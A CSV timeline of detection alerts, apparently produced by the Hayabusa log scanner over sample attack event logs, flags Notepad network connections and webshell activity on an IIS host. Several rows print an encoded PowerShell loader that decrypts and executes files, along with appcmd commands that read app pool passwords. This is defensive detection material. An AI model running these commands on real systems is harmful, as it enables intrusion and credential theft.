2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe""  :  Path: C:\Windows\System32\notepad.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe""  list vdir /text:physicalpath  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppools /text:name  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAH